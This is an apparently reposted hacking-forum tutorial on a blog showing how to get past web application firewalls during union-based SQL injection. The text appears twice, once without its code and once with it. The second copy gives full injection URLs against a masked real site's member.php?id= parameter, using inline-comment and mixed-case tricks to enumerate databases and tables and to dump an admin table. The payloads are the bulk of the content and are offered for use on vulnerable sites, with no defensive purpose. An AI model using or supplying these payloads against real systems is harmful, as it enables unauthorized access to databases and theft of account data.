SQL Injection; Basic WAF bypass
~
jeudi 19 janvier 2012
Libellés :
SQL injection
I assume you know how to perform a union based SQL injection, if not check out my tutorial here:
http://www.hackforums.net/showthread.php?tid=1148283
Ok lets get started.
You have found your SQLi vulnerable site, you found how many columns it has (in this case 62 xD)
You do the regular command:
The website returns this error message:
![[Image: tutorialmessage.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uHBUnnTyioJonw9hPwZwE4WXtonBnN8fnD0PCTE4N4lCmaOx_o_GrbfrnOorEA5yFiID8ifBM09XDmcGiYzLY1apXZq-Q_z_wH3SsQ9wCsvkK98cD-4HpD3B8cD3ey=s0-d)
What you would like to do now is you use inline comments to comment out the blocked commands, like this:
And now the website returns this:
![[Image: tutorialnumbers.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s_BU7fK0p3NxezzR1PcZeb-eI43YnhLLyUTLvBF7RFwXwXdl_T6XNStfN-a1sKnfcSue7BI15Xe3kYWeNRlP3LXdeXhLcFaf7djfr3Nyon4e68RJt5ACn-199vlbn6=s0-d)
Ok now we will try to add version(),database() and user() in one line like this:
The website returns this:
We would now like to make "concat" both upper and lower case letters, like this:
The website returns;
![[Image: tutorialversion.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tKV-KKIt6DT36uDVcSnW4mAaMIxUo4cFMwgvXsFZjAC7URdSGbkcdWoVDL0LbRDldges3jyoQAUYtQedGzLmFG4RgeFZuXHpRo7FSnr01kLgN1XlWKAQIKGOtWnwI=s0-d)
Now for the good part; lets try to find all the databases, here is the regular syntax:
But with our new techniques the syntax would look like this:
The website returns:
![[Image: tutorialdbs.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s_MRt-8GRViTi8SpuDMapIPmvOP0aGH_1Kc3nmh5_GwQ5ZlpWC6JhibYZ87GtojM-SelZSqgA3cHLf_4tFr12X8x6PKU7b_6NuKx0LqM-3h8zI1ZERnOG80fM=s0-d)
now we would like to get the tables:
The website returns:
Now you have to in some way comment out information_schema or tables, like this:
and this returns:
![[Image: tutorialtables.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uQ7nl9ArxlLgKZ4_5Q_JIcxrFW27VwxWFpKjEqIZejMJqoclca1Di2rzkKjn52LCLqzyEhYWP6WM4eldu2ZcZQFGy8agIM8Mfn8nK9I7DMfnunj-xQ4VeQe7gMMQ=s0-d)
it's the same to get columns, you know the drill.
If you now want to dump columns id from admin table you do like this:
Hope you learned something from my tutorial, feel free to ask if you have any questions.
REMEMBER; This is only BASIC WAF bypass, the techniques are endless
I have worked hard on this, please don't leech it.
If you do, give credits to me.
© Copyright Join7 2011
http://www.hackforums.net/showthread.php?tid=1148283
Ok lets get started.
You have found your SQLi vulnerable site, you found how many columns it has (in this case 62 xD)
You do the regular command:
Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7,58,59,60,61,62--The website returns this error message:
What you would like to do now is you use inline comments to comment out the blocked commands, like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7,58,59,60,61,62--And now the website returns this:
Ok now we will try to add version(),database() and user() in one line like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,concat('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62--The website returns this:
We would now like to make "concat" both upper and lower case letters, like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,CoNcAt('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62--The website returns;
Now for the good part; lets try to find all the databases, here is the regular syntax:
Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4 9,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--But with our new techniques the syntax would look like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,GrOuP_CoNcAt(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4 9,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--The website returns:
now we would like to get the tables:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.tables where table_schema=database()--The website returns:
Now you have to in some way comment out information_schema or tables, like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52,53,54,55,56,57,58,59,60,61,62 from /*!information_schema*/.tables where table_schema=database()--and this returns:
it's the same to get columns, you know the drill.
If you now want to dump columns id from admin table you do like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,5 2,53,54,55,56,57,58,59,60,61,62 from admin--Hope you learned something from my tutorial, feel free to ask if you have any questions.
REMEMBER; This is only BASIC WAF bypass, the techniques are endless
I have worked hard on this, please don't leech it.
If you do, give credits to me.
© Copyright Join7 2011
Articles
0 commentaires :
Enregistrer un commentaire